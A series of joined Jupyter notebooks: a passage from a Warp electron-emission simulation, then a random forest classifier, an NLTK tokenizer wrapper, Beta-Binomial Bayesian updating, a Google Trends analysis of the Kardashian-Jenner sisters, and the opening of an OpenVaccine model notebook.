cathode_area = 2.*SOURCE_RADIUS_1*1. # 1 m is the geometric factor scaling the plane of the ignorable coordinate
#Set a default 'USER_CURRENT' to the Richardson-Dushman current in case of user-specified constant emission
#This will ultimately be an adjustable GUI parameter.
USER_CURRENT = cl_limit*cathode_area #sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area
# If true, position and angle of injected particle are computed analytically rather than interpolated
# Can be false for all but C-L injection (inject=2)
w3d.l_inj_exact = False
#Specify particles to be injected each step - 10 macro-particles per cell by default, USER SPECIFIED IN FUTURE
PTCL_PER_STEP = 10*NUM_X
top.npinject = PTCL_PER_STEP
# --- If using the XZ geometry, set so injection uses the same geometry
top.linj_rectangle = (w3d.solvergeom == w3d.XZgeom)
#Determine an appropriate time step based upon estimated final velocity
vzfinal = sqrt(2.*abs(vacuum_level)*np.abs(beam.charge)/beam.mass)+beam_beta*c
dt = dz/vzfinal #5e-15
top.dt = dt
if vzfinal*top.dt > dz:
print "Time step dt = {:.3e}s does not constrain motion to a single cell".format(top.dt)
if USER_INJECT == 1:
# Constant current density - beam transverse velocity fixed to zero, very small longitduinal velocity
#Set injection flag
top.inject = 6 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified
beam.ibeam = USER_CURRENT
beam.a0 = SOURCE_RADIUS_1
beam.b0 = SOURCE_RADIUS_2
#sources.constant_current(beam, CHANNEL_WIDTH, Z_PART_MIN, ptcl_per_step)
myInjector = injectors.injectorUserDefined(beam, CATHODE_TEMP, CHANNEL_WIDTH, Z_PART_MIN, PTCL_PER_STEP)
installuserinjection(myInjector.inject_constant)
if USER_INJECT == 2:
# space charge limited injection using Child-Langmuir computation of cold limit
#Set injection flag
top.inject = 2 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified
beam_current = sources.cl_limit(CATHODE_PHI, ANODE_WF, GRID_BIAS, PLATE_SPACING)*cathode_area
beam.ibeam = beam_current
beam.a0 = SOURCE_RADIUS_1
beam.b0 = SOURCE_RADIUS_2
w3d.l_inj_exact = True
elif USER_INJECT == 3:
#Thermionic injection
#Set injection flag
top.inject = 6 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified
beam_current = sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area #steady state current in Amps
beam.ibeam = beam_current
beam.a0 = SOURCE_RADIUS_1
beam.b0 = SOURCE_RADIUS_2
myInjector = injectors.injectorUserDefined(beam, CATHODE_TEMP, CHANNEL_WIDTH, Z_PART_MIN, PTCL_PER_STEP)
installuserinjection(myInjector.inject_thermionic)
# These must be set for user injection
top.ainject = 1.0
top.binject = 1.0
derivqty()
###Output
_____no_output_____
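###Markdown
Before building the solver, a quick cross-check of the emission currents used above. This is only a sketch: it assumes that `sources.j_rd` and `sources.cl_limit` implement the textbook Richardson-Dushman and (cold) Child-Langmuir expressions, with the effective accelerating voltage given by `vacuum_level`.
###Code
from scipy.constants import epsilon_0
#Textbook Richardson-Dushman current density: J = A0*T^2*exp(-phi/(kB*T))
A0 = 1.20173e6 #Richardson constant in A/(m^2 K^2)
j_rd_check = A0*CATHODE_TEMP**2*np.exp(-CATHODE_PHI/(kb_eV*CATHODE_TEMP))
#Textbook cold Child-Langmuir limit: J = (4*eps0/9)*sqrt(2e/m)*V^(3/2)/d^2
j_cl_check = (4.*epsilon_0/9.)*np.sqrt(2.*e/m_e)*vacuum_level**1.5/PLATE_SPACING**2
print "Richardson-Dushman check: {:.3e} A/m^2 vs. sources.j_rd: {:.3e} A/m^2".format(j_rd_check, sources.j_rd(CATHODE_TEMP,CATHODE_PHI))
print "Child-Langmuir check: {:.3e} A/m^2 vs. sources.cl_limit: {:.3e} A/m^2".format(j_cl_check, cl_limit)
###Output
_____no_output_____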
###Markdown
Create solver
###Code
# Set up fieldsolver
f3d.mgtol = 1e-6 # Multigrid solver convergence tolerance, in volts. 1 uV is default in Warp.
solverE = MultiGrid2D()
registersolver(solverE)
###Output
_____no_output_____
###Markdown
Install conductors
###Code
# --- Emitter settings
extractor_voltage = vacuum_level
# --- Anode Location
zplate = Z_MAX#1e-6 # --- plate location
# Create source conductors
source = ZPlane(zcent=w3d.zmmin,zsign=-1.,voltage=0.)
installconductor(source, dfill=largepos)
# Create ground plate
plate = ZPlane(voltage=extractor_voltage, zcent=zplate)
installconductor(plate,dfill=largepos)
# Setup the particle scraper
scraper = ParticleScraper([source, plate])
###Output
_____no_output_____
###Markdown
Define diagnostics
###Code
particleperiod = 100
particle_diagnostic_0 = ParticleDiagnostic(period = particleperiod, top = top, w3d = w3d,
species = {species.name: species for species in listofallspecies},
comm_world=comm_world, lparallel_output=False, write_dir = diagDir[:-5])
fieldperiod = 100
efield_diagnostic_0 = FieldDiagnostic.ElectrostaticFields(solver=solverE, top=top, w3d=w3d, comm_world = comm_world,
period=fieldperiod)
installafterstep(particle_diagnostic_0.write)
installafterstep(efield_diagnostic_0.write)
###Output
_____no_output_____
###Markdown
UPDATED - Generate simulation package and plot potentialThis call has been updated to allow for plotting of the electrostatic potential. Rather than calling generate with its default parameters, the `mgmaxiters` parameter is set to a large value (12000) to allow the initial solve called by generate to produce a potential that has converged to the geometry. After `generate()` is finished, the parameter is reset to its default of 100.
###Code
#prevent GIST from starting upon setup
top.lprntpara = false
top.lpsplots = false
top.verbosity = 0 # Reduce solver verbosity
solverE.mgverbose = 0 #further reduce output upon stepping - prevents websocket timeouts in Jupyter notebook
#Adjusting the multigrid parameter here improves convergence speed
omega = 2./(1. + np.sin(np.pi/min(NUM_X+1,NUM_Z+1)))
solverE.mgparam = omega
solverE.mgmaxiters = 12000 #rough approximation needed for initial solve to converge
package("w3d")
generate()
solverE.mgmaxiters = 100
###Output
*** particle simulation package W3D generating
--- Resetting lattice array sizes
--- Allocating space for particles
--- Loading particles
--- Setting charge density
--- done
--- Allocating Win_Moments
--- Allocating Z_Moments
--- Allocating Lab_Moments
Multigrid2d: Max. # of iterations reached
Multigrid2d: Error converged to 6.663E-06 in 12000 v-cycles
###Markdown
UPDATED - Now plot the potential
###Code
#Need to compute the potential first
potential = solverE.getphi()
#Now plot
fig = plt.figure(figsize=(12,6))
X_CELLS = NUM_X
Z_CELLS = NUM_Z
potential = solverE.getphi()
xl = 0
xu = NUM_X
zl = 0
zu = NUM_Z
midpoint = 1 - np.max(potential[xl:xu,zl:zu])/(np.max(potential[xl:xu,zl:zu]) +
abs(np.min(potential[xl:xu,zl:zu])))
plt.xlabel("z ($\mu$m)")
plt.ylabel("x ($\mu$m)")
plt.title("$\phi$ Across Whole Domain")
pxmin = ((X_MAX - X_MIN) / X_CELLS * xl + X_MIN) * 1e6
pxmax = ((X_MAX - X_MIN) / X_CELLS * xu + X_MIN) * 1e6
pzmin = (Z_MIN + zl / Z_CELLS * Z_MAX) * 1e6
pzmax = (Z_MAX * zu / Z_CELLS) * 1e6
plt.xlim(pzmin, pzmax)
plt.ylim(pxmin, pxmax)
phi_plt = plt.imshow(potential[xl:xu,zl:zu],cmap='viridis',extent=[pzmin, pzmax, pxmin, pxmax],aspect='auto')
cbar = fig.colorbar(phi_plt)
cbar.ax.set_xlabel("Volts")
cbar.ax.xaxis.set_label_position('top')
#plt.show()
###Output
_____no_output_____
###Markdown
Estimate the time of flight for an electron crossing the gapWe will estimate the average time of flight for a particle by averaging over the x-plane of the electric field, then integrating the particle motion in that averaged electric field. For our simulation particle we will take an electron with the expected velocity based on a thermal distribution with the cathode temperature.**Note that this requires importing the interp1d function from scipy.interpolate**
###Code
from scipy.interpolate import interp1d as scipy_interp1d
#Grab Ez from the solver and average over the transverse (x) plane
Ez = solverE.getez()
flat_Ez = numpy.mean(Ez,0)
#Generate an interpolating function for smooth particle integration
Ez_approx = scipy_interp1d(zmesh,flat_Ez, kind='cubic')
#Integrate the particle motion subject to initial conditions specified by the simulation
tof_expected = sources.compute_expected_time(beam, CATHODE_TEMP, Ez_approx, Z_MIN, Z_MAX, top.dt)
print "Expected time of flight is {}s".format(tof_expected)
print "This corresponds to {} steps".format(tof_expected/top.dt)
###Output
Expected time of flight is 1.95578558527e-11s
This corresponds to 1259.0 steps
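###Markdown
As a rough cross-check (a sketch, not part of the original workflow): ignoring space charge and the initial thermal velocity, a uniform field $V/d$ gives a transit time $t \approx d\sqrt{2m/(qV)}$, which should agree with the integrated estimate above to within tens of percent.
###Code
#Uniform-field, zero-initial-velocity estimate of the gap transit time
t_uniform = PLATE_SPACING*np.sqrt(2.*m_e/(e*vacuum_level))
print "Uniform-field estimate of the time of flight: {:.3e}s".format(t_uniform)
###Output
_____no_output_____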
###Markdown
Run simulation
###Code
#%%time
num_steps = 5000
output_steps = np.linspace(0,num_steps,num_steps/particleperiod + 1)[1:]
step_count = 0
time0 = time.time()
step(num_steps)
time1 = time.time()
time_per_step = (time1-time0)/num_steps
###Output
*** particle simulation package W3D running
###Markdown
Some basic diagnosticsA few diagnostics for testing. Specifically, we look at the current across the gap at the end of the simulation to verify that it's uniform at the value expected.
###Code
efield_path = diagFDir['electric']
efield_files = [os.path.join(efield_path,fn) for fn in os.listdir(efield_path)]
efield_files.sort()
fielddata_file = efield_files[-1]
step_number = int(findall(r'\d+', fielddata_file)[0])
data_efield = h5py.File(fielddata_file, 'r')
Ex = data_efield['data/%s/meshes/E/x' % (step_number)]
Ey = data_efield['data/%s/meshes/E/y' % (step_number)]
Ez = data_efield['data/%s/meshes/E/z' % (step_number)]
phi = data_efield['data/%s/meshes/phi'% (step_number)]
particles_path = diagDir
particles_files = [os.path.join(particles_path,fn) for fn in os.listdir(particles_path)]
particles_files.sort()
particledata_file = particles_files[-1]
# Read single particle diagnostic file in
f0 = readparticles(particledata_file.format(num_steps))
# Read all particles into directory. Structure: name[int stepnumber][str Species name]
fall = loadparticlefiles(particles_path)
def get_zcurrent_new(particle_array, momenta, mesh, particle_weight, dz):
"""
Find z-directed current on a per cell basis
particle_array: z positions at a given step
momenta: particle momenta at a given step in SI units
mesh: Array of Mesh spacings
particle_weight: Weight from Warp
dz: Cell Size
"""
charge = 1.60217662e-19
mass = 9.10938356e-31
current = np.zeros_like(mesh)
velocity = c * momenta / np.sqrt(momenta**2 + (mass * c)**2)
for index, zval in enumerate(particle_array):
bucket = np.round(zval/dz) #value of the bucket/index in the current array
current[int(bucket)] += velocity[index]
return current* charge * particle_weight / dz
# Get current for all steps (takes a long time)
current_history = []
for i in range(particleperiod,num_steps,particleperiod):
#print i
curr = get_zcurrent_new(fall[i]['beam'][:,4],fall[i]['beam'][:,5],zmesh,beam.sw,dz)
current_history.append(curr)
current_history = np.asarray(current_history)
#Plot the current across gap at a single time
fig5 = plt.figure(figsize=(16,6))
#scalings
h_scale = 1.e6
y_range_max = beam.ibeam*1.e3*1.2
#current plotted from grid
plt.plot(zmesh*h_scale,np.array(current_history[-1])*1e3,'k')
#Compute and plot idealized currents as needed
RD_ideal = np.ones(len(zmesh))*sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area
JCL_ideal = np.ones(len(zmesh))*cl_limit*cathode_area
if (RD_ideal[0]*1e3 <= y_range_max):
plt.plot(zmesh*h_scale,RD_ideal*1.e3,'r--',label=r'Richardson-Dushman')
if (JCL_ideal[0]*1e3 <= y_range_max):
plt.plot(zmesh*h_scale,JCL_ideal*1.e3,'b--',label=r'I$_{cl}$ cold limit')
#labels and legends
plt.xlabel("z ($\mu$m)",fontsize='16')
plt.ylabel("current (mA)",fontsize='16')
plt.title("Current - {:.4E}s".format(fall[num_steps]['time']),fontsize=18)
plt.xlim(Z_MIN,Z_MAX*1.e6)
plt.ylim(0, y_range_max)
plt.legend(loc=4)
title = 'current_{:.4f}ps-test.pdf'.format(CATHODE_TEMP,fall[num_steps]['time']*1.e9)
#fig5.savefig(title,bbox_inches='tight')
###Output
_____no_output_____ |
RandomForest_Classifier.ipynb | ###Markdown
Importing data
###Code
import numpy as np
import pandas as pd

data=pd.read_csv('Social_Network_Ads.csv')
print(data.head())
data.describe()
###Output
_____no_output_____
###Markdown
Checking null values
###Code
data.isnull().sum()
###Output
_____no_output_____
###Markdown
Splitting data
###Code
from sklearn.model_selection import train_test_split
x=data.iloc[:,:-1].values
y=data.iloc[:,-1].values.reshape(-1,1)
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.25,random_state=0)
###Output
_____no_output_____
###Markdown
Feature Scaling
###Code
from sklearn.preprocessing import StandardScaler
sc=StandardScaler()
x_train=sc.fit_transform(x_train)
x_test=sc.transform(x_test)
###Output
_____no_output_____
###Markdown
Model Building and Training
###Code
from sklearn.ensemble import RandomForestClassifier
# 100 trees, entropy (information gain) as the split criterion, fixed seed for reproducibility
rmc=RandomForestClassifier(n_estimators=100,criterion='entropy',random_state=0)
rmc.fit(x_train,y_train)
# accuracy on the training set
rmc.score(x_train,y_train)
###Output
_____no_output_____
###Markdown
Prediction Using the Model
###Code
y_pred=rmc.predict(x_test).reshape(-1,1)
print(np.concatenate((y_test,y_pred),axis=1))
###Output
[[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[1 1]
[0 0]
[0 1]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 1]
[0 1]
[0 0]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[1 1]
[0 0]
[1 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[1 0]
[1 1]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[1 1]
[1 1]
[0 0]
[0 0]
[0 0]
[1 1]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[1 1]
[0 0]
[1 1]
[0 0]
[0 0]
[0 0]
[0 1]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[0 0]
[0 0]
[1 1]
[1 1]
[1 1]
[0 1]
[0 0]
[0 0]
[1 1]
[1 0]
[0 0]
[1 1]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[0 0]
[1 0]
[0 0]
[1 1]
[1 1]
[1 1]]
###Markdown
Model Accuracy
###Code
from sklearn.metrics import accuracy_score
accuracy_score(y_test,y_pred)
###Output
_____no_output_____
###Markdown
Confusion Matrix
###Code
from sklearn.metrics import confusion_matrix
confusion_matrix(y_test,y_pred)
###Output
_____no_output_____ |
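###Markdown
Feature Importances As an optional check (a small sketch added for illustration), we can ask the trained forest how much each input column contributed to its decisions, using scikit-learn's feature_importances_ attribute.
###Code
# Impurity-based importance of each feature column, in the same order as the columns of x
print(rmc.feature_importances_)
###Output
_____no_output_____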
tomef/tokenizer/pt_tokenizer.py.ipynb | ###Markdown
PT Tokenizer This is a wrapper around the Penn Treebank tokenizer provided by the NLTK. For more information see https://www.nltk.org/api/nltk.tokenize.html --- Setup and Settings---
###Code
from __init__ import init_vars
init_vars(vars())
import nltk
try:
nltk.data.find('tokenizers/punkt')
except LookupError:
nltk.download('punkt')
from nltk.tokenize import word_tokenize
import tokenizer.common
from tokenizer.token_util import TokenizerBase
###Output
_____no_output_____
###Markdown
--- Build PTTokenizer class---
###Code
class PTTokenizer(TokenizerBase):
    def tokenize(self, text, *args):
        # Replace any occurrence of the corpus separator token with its replacement string,
        # then delegate to NLTK's Penn Treebank word tokenizer
        text = text.replace(tokenizer.common.separator_token,tokenizer.common.separator_token_replacement)
        return word_tokenize(text)
###Output
_____no_output_____ |
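###Markdown
A quick usage sketch (added for illustration; it assumes `TokenizerBase` can be instantiated without arguments):
###Code
pt_tokenizer = PTTokenizer()
print(pt_tokenizer.tokenize("Dr. Smith doesn't approve of the U.S. plan, does she?"))
###Output
_____no_output_____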
10_bayesian_machine_learning/01_updating_conjugate_priors.ipynb | ###Markdown
Bayesian Updating with Conjugate Priors When the data consists of binary Bernoulli random variables with a certain success probability for a positive outcome, the number of successes in repeated trials follows a Binomial distribution. The conjugate prior is the Beta distribution with support over the interval [0, 1] and two shape parameters to model arbitrary prior distributions over the success probability. Hence, the posterior distribution is also a Beta distribution that we can derive by directly updating the parameters. Setup
###Code
import warnings
warnings.filterwarnings('ignore')
%matplotlib inline
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
import scipy.stats as stats
from matplotlib.ticker import FuncFormatter
import matplotlib as mpl
mpl.rcParams['text.usetex'] = True
mpl.rcParams['text.latex.preamble'] = [r'\usepackage{amsmath}']
np.random.seed(42)
sns.set_style('dark')
###Output
_____no_output_____
###Markdown
Formatting Helper
###Code
def format_plot(axes, i, p, y, trials, success, true_p, tmle, tmap=None):
fmt = FuncFormatter(lambda x, _: f'{x:.0%}')
if i >= 6:
axes[i].set_xlabel("$p$, Success Probability")
axes[i].xaxis.set_major_formatter(fmt)
else:
axes[i].axes.get_xaxis().set_visible(False)
if i % 3 == 0:
axes[i].set_ylabel("Posterior Probability")
axes[i].set_yticks([], [])
axes[i].plot(p, y, lw=1, c='k')
axes[i].fill_between(p, y, color='darkblue', alpha=0.4)
axes[i].vlines(true_p, 0, max(10, np.max(y)), color='k', linestyle='--', lw=1)
axes[i].set_title(f'Trials: {trials:,d} - Success: {success:,d}')
if i > 0:
smle = r"$\theta_{{\mathrm{{MLE}}}}$ = {:.2%}".format(tmle)
axes[i].text(x=.02, y=.85, s=smle, transform=axes[i].transAxes)
smap = r"$\theta_{{\mathrm{{MAP}}}}$ = {:.2%}".format(tmap)
axes[i].text(x=.02, y=.75, s=smap, transform=axes[i].transAxes)
return axes[i]
###Output
_____no_output_____
###Markdown
Simulate Coin Tosses & Updates of Posterior
###Code
n_trials = [0, 1, 3, 5, 10, 25, 50, 100, 500]
outcomes = stats.bernoulli.rvs(p=0.5, size=n_trials[-1])
p = np.linspace(0, 1, 100)
# uniform (uninformative) prior
a = b = 1
fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(14, 7), sharex=True)
axes = axes.flatten()
fmt = FuncFormatter(lambda x, _: f'{x:.0%}')
for i, trials in enumerate(n_trials):
successes = outcomes[:trials]
theta_mle = np.mean(successes)
heads = sum(successes)
tails = trials - heads
update = stats.beta.pdf(p, a + heads , b + tails)
theta_map = pd.Series(update, index=p).idxmax()
axes[i] = format_plot(axes, i, p, update, trials=trials, success=heads,
true_p=.5, tmle=theta_mle, tmap=theta_map)
title = 'Bayesian Probabilities: Updating the Posterior'
fig.suptitle(title, y=1.02, fontsize=14)
fig.tight_layout()
###Output
_____no_output_____
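###Markdown
For reference, the update rule used in the cell above written out: with a $\mathrm{Beta}(a, b)$ prior and $k$ observed successes in $n$ trials, the posterior is $\mathrm{Beta}(a + k,\, b + n - k)$. Its mode, the MAP estimate, is $\theta_{\mathrm{MAP}} = \frac{a + k - 1}{a + b + n - 2}$ (when both parameters exceed 1), while the MLE is simply $k/n$; this is why the two estimates converge as the number of trials grows in the plots above and below.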
###Markdown
Stock Price Moves We will collect samples of different sizes of binarized daily S&P 500 returns where the positive outcome is a price increase. Starting from an uninformative prior that allocates equal probability to each possible success probability in the interval [0, 1], we compute the posterior for different evidence samples.
###Code
sp500_returns = pd.read_hdf('../data/assets.h5', key='sp500/fred').loc['2010':, 'close']
sp500_binary = (sp500_returns.pct_change().dropna() > 0).astype(int)
###Output
_____no_output_____
###Markdown
The following code sample shows that the update consists simply of adding the observed numbers of successes and failures to the parameters of the prior distribution to obtain the posterior.The resulting posterior distributions are plotted below. They illustrate the evolution from a uniform prior that views all success probabilities as equally likely to an increasingly peaked distribution.After 500 samples, the probability is concentrated near the actual probability of a positive move at 54.7% from 2010 to 2017. The plots also show the small differences between MLE and MAP estimates, where the latter tends to be pulled slightly towards the expected value of the uniform prior.
###Code
n_days = [0, 1, 3, 5, 10, 25, 50, 100, 500]
# random sample of trading days
# outcomes = sp500_binary.sample(n_days[-1])
# initial 500 trading days
outcomes = sp500_binary.iloc[:n_days[-1]]
p = np.linspace(0, 1, 100)
# uniform (uninformative) prior
a = b = 1
fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(14, 7), sharex=True)
axes = axes.flatten()
for i, days in enumerate(n_days):
successes = outcomes.iloc[:days]
theta_mle = successes.mean()
up = successes.sum()
down = days - up
update = stats.beta.pdf(p, a + up , b + down)
theta_map = pd.Series(update, index=p).idxmax()
axes[i] = format_plot(axes, i, p, update, trials=days, success=up,
true_p=sp500_binary.mean(), tmle=theta_mle, tmap=theta_map)
title = 'Bayesian Probabilities: Updating the Posterior'
fig.suptitle(title, y=1.02, fontsize=14)
fig.tight_layout()
###Output
_____no_output_____ |
_notebooks/2020-08-20-01-Up-and-Down-With-the-Kardashians.ipynb | ###Markdown
Up and Down With the Kardashians> While I'm not a fan nor a hater of the Kardashians and Jenners, the polarizing family intrigues me. Why? Their marketing prowess. Say what you will about them and what they stand for, they are great at the hype game. Everything they touch turns to content. In this Project, you will explore the data underneath the hype in the form of search interest data from Google Trends. You'll recreate the Google Trends plot to visualize their ups and downs over time, then make a few custom plots of your own. And you'll answer the big question - "is Kim even the most famous sister anymore?" This is the Result of Project "Up and Down With the Kardashians", via datacamp.- toc: true - badges: true- comments: true- author: Chanseok Kang- categories: [Python, Datacamp, Data_Science, Visualization]- image: images/kardashian_jenner_family_tree.png 1. The sisters and Google TrendsWhile I'm not a fan nor a hater of the Kardashians and Jenners, the polarizing family intrigues me. Why? Their marketing prowess. Say what you will about them and what they stand for, they are great at the hype game. Everything they touch turns to content.The sisters in particular over the past decade have been especially productive in this regard. Let's get some facts straight. I consider the "sisters" to be the following daughters of Kris Jenner. Three from her first marriage to lawyer Robert Kardashian:Kourtney Kardashian (daughter of Robert Kardashian, born in 1979)Kim Kardashian (daughter of Robert Kardashian, born in 1980)Khloé Kardashian (daughter of Robert Kardashian, born in 1984)And two from her second marriage to Olympic gold medal-winning decathlete, Caitlyn Jenner (formerly Bruce):Kendall Jenner (daughter of Caitlyn Jenner, born in 1995)Kylie Jenner (daughter of Caitlyn Jenner, born in 1997)This family tree can be confusing, but we aren't here to explain it. We're here to explore the data underneath the hype, and we'll do it using search interest data from Google Trends. We'll recreate the Google Trends plot to visualize their ups and downs over time, then make a few custom plots of our own. And we'll answer the big question: is Kim even the most famous sister anymore?First, let's load and inspect our Google Trends data, which was downloaded in CSV form. The query parameters: each of the sisters, worldwide search data, 2007 to present day. (2007 was the year Kim became "active" according to Wikipedia.)
###Code
import matplotlib.pyplot as plt
import pandas as pd
plt.rcParams['figure.figsize'] = (10, 8)
# Read in dataset
trends = pd.read_csv('./dataset/trends_kj_sisters.csv')
# Inspect data
trends.head()
###Output
_____no_output_____
###Markdown
2. Better "kolumn" namesSo we have a column for each month since January 2007 and a column for the worldwide search interest for each of the sisters each month. By the way, Google defines the values of search interest as: Numbers represent search interest relative to the highest point on the chart for the given region and time. A value of 100 is the peak popularity for the term. A value of 50 means that the term is half as popular. A score of 0 means there was not enough data for this term.Okay, that's great Google, but you are not making this data easily analyzable for us. I see a few things. Let's do the column names first. A column named "Kim Kardashian: (Worldwide)" is not the most usable for coding purposes. Let's shorten those so we can access their values better. Might as well standardize all column formats, too. I like lowercase, short column names.
###Code
# Make column names easier to work with
trends.columns = ['month', 'kim', 'khloe', 'kourtney', 'kendall', 'kylie']
# Inspect data
trends.head()
###Output
_____no_output_____
###Markdown
3. Pesky data types

That's better. We don't need to scroll our eyes across the table to read the values anymore since it is much less wide. And seeing five columns that all start with the letter "k" … the aesthetics … we should call them "kolumns" now! (Bad joke.)

The next thing I see that is going to be an issue is that "<" sign. If "a score of 0 means there was not enough data for this term," "<1" must mean it is between 0 and 1 and Google does not want to give us the fraction from google.trends.com for whatever reason. That's fine, but this "<" sign means we won't be able to analyze or visualize our data right away because those column values aren't going to be represented as numbers in our data structure. Let's confirm that by inspecting our data types.
###Code
# Inspect data types
trends.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 147 entries, 0 to 146
Data columns (total 6 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 month 147 non-null object
1 kim 147 non-null int64
2 khloe 147 non-null object
3 kourtney 147 non-null object
4 kendall 147 non-null object
5 kylie 147 non-null int64
dtypes: int64(2), object(4)
memory usage: 7.0+ KB
###Markdown
4. From object to integer

Yes, okay, the khloe, kourtney, and kendall columns aren't integers like the kim and kylie columns are. Again, because of the "<" sign that indicates a search interest value between zero and one. Is this an early hint at the hierarchy of sister popularity? We'll see shortly. Before that, we'll need to remove that pesky "<" sign. Then we can change the type of those columns to integer.
###Code
# Loop through columns
for column in trends.columns:
# Only modify columns that have the "<" sign
if "<" in trends[column].to_string():
# Remove "<" and convert dtype to integer
trends[column] = trends[column].str.replace("<", "")
trends[column] = pd.to_numeric(trends[column])
# Inspect data types and data
trends.info()
trends.head()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 147 entries, 0 to 146
Data columns (total 6 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 month 147 non-null object
1 kim 147 non-null int64
2 khloe 147 non-null int64
3 kourtney 147 non-null int64
4 kendall 147 non-null int64
5 kylie 147 non-null int64
dtypes: int64(5), object(1)
memory usage: 7.0+ KB
###Markdown
5. From object to datetime

Okay, great, no more "<" signs. All the sister columns are of integer type.

Now let's convert our month column from type object to datetime to make our date data more accessible.
###Code
# Convert month to type datetime
trends['month'] = pd.to_datetime(trends['month'])
# Inspect data types and data
trends.info()
trends.head()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 147 entries, 0 to 146
Data columns (total 6 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 month 147 non-null datetime64[ns]
1 kim 147 non-null int64
2 khloe 147 non-null int64
3 kourtney 147 non-null int64
4 kendall 147 non-null int64
5 kylie 147 non-null int64
dtypes: datetime64[ns](1), int64(5)
memory usage: 7.0 KB
###Markdown
6. Set month as index

And finally, let's set the month column as our index to wrap up our data cleaning. Having month as the index rather than the zero-based row numbers will allow us to write shorter lines of code to create plots, where month will represent our x-axis.
###Code
# Set month as DataFrame index
trends = trends.set_index('month')
# Inspect the data
trends.head()
###Output
_____no_output_____
###Markdown
7. The early Kim hype

Okay! So our data is ready to plot. Because we cleaned our data, we only need one line of code (and just thirteen characters!) to remake the Google Trends chart, plus another line to make the plot show up in our notebook.
###Code
# Plot search interest vs. month
%matplotlib inline
fig, ax = plt.subplots(figsize=(10, 8))
trends.plot(ax=ax);
###Output
_____no_output_____
###Markdown
8. Kylie's rise

Oh my! There is so much to make sense of here. Kim's sharp rise in 2007, with the beginning of Keeping Up with the Kardashians, among other things. There was no significant search interest for the other four sisters until mid-2009 when Kourtney and Khloé launched the reality television series, Kourtney and Khloé Take Miami. Then there was Kim's rise from famous to literally more famous than God in 2011. This Cosmopolitan article covers the timeline that includes the launch of music videos, fragrances, iPhone and Android games, another television series, joining Instagram, and more. Then there was Kim's ridiculous spike in December 2014: posing naked on the cover of Paper Magazine in a bid to break the internet will do that for you.

A curious thing starts to happen after that bid as well. Let's zoom in…
###Code
# Zoom in from January 2014
fig, ax = plt.subplots(figsize=(10, 8))
trends.loc['2014-01':'2019-03'].plot(ax=ax);
###Output
_____no_output_____
###Markdown
9. Smooth out the fluctuations with rolling means

It looks like my suspicion may be true: Kim is not always the most searched Kardashian or Jenner sister. Since late-2016, at various months, Kylie overtakes Kim. Two big spikes where she smashed Kim's search interest: in September 2017 when it was reported that Kylie was expecting her first child with rapper Travis Scott, and in February 2018 when she gave birth to her daughter, Stormi Webster. The continued success of Kylie Cosmetics has kept her in the news, not to mention making her "The Youngest Self-Made Billionaire Ever" according to Forbes.

These fluctuations are descriptive but do not really help us answer our question: is Kim even the most famous sister anymore? We can use rolling means to smooth out short-term fluctuations in time series data and highlight long-term trends. Let's make the window twelve months, a.k.a. one year.
###Code
# Smooth the data with rolling means
fig, ax = plt.subplots(figsize=(10, 8))
trends.rolling(window=12).mean().plot(ax=ax);
###Output
_____no_output_____
###Markdown
10. Who's more famous? The Kardashians or the Jenners?

Whoa, okay! So by this metric, Kim is still the most famous sister despite Kylie being close and nearly taking her crown. Honestly, the biggest takeaway from this whole exercise might be Kendall not showing up that much. It makes sense, though, despite her wildly successful modeling career. Some have called her "the only normal one in her family" as she tends to shy away from the more dramatic and controversial parts of the media limelight that generate oh so many clicks.

Let's end this analysis with one last plot. In it, we will plot (pun!) the Kardashian sisters against the Jenner sisters to see which family line is more popular now. We will use average search interest to make things fair, i.e., total search interest divided by the number of sisters in the family line.

The answer? Since 2015, it has been a toss-up. And in the future? With this family and their penchant for big events, who knows?
###Code
# Average search interest for each family line
trends['kardashian'] = trends[['kim', 'khloe', 'kourtney']].sum(axis=1) / 3
trends['jenner'] = trends[['kendall', 'kylie']].sum(axis=1) / 2
# Plot average family line search interest vs. month
fig, ax = plt.subplots(figsize=(10, 8))
trends[['kardashian', 'jenner']].plot(ax=ax);
###Output
_____no_output_____ |
Model backlog/Models/88-openvaccine-6xconv-bigru-aug-sampling-5-v2.ipynb | ###Markdown
Dependencies
###Code
from openvaccine_scripts import *
import warnings, json
from sklearn.model_selection import KFold, StratifiedKFold, GroupKFold
import tensorflow.keras.layers as L
import tensorflow.keras.backend as K
from tensorflow.keras import optimizers, losses, Model
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau
SEED = 0
seed_everything(SEED)
warnings.filterwarnings('ignore')
###Output
_____no_output_____
###Markdown
Model parameters
###Code
config = {
"BATCH_SIZE": 32,
"EPOCHS": 70,
"LEARNING_RATE": 1e-3,
"ES_PATIENCE": 10,
"N_FOLDS": 5,
"N_USED_FOLDS": 5,
"PB_SEQ_LEN": 107,
"PV_SEQ_LEN": 130,
}
with open('config.json', 'w') as json_file:
json.dump(json.loads(json.dumps(config)), json_file)
config
###Output
_____no_output_____
###Markdown
Load data
###Code
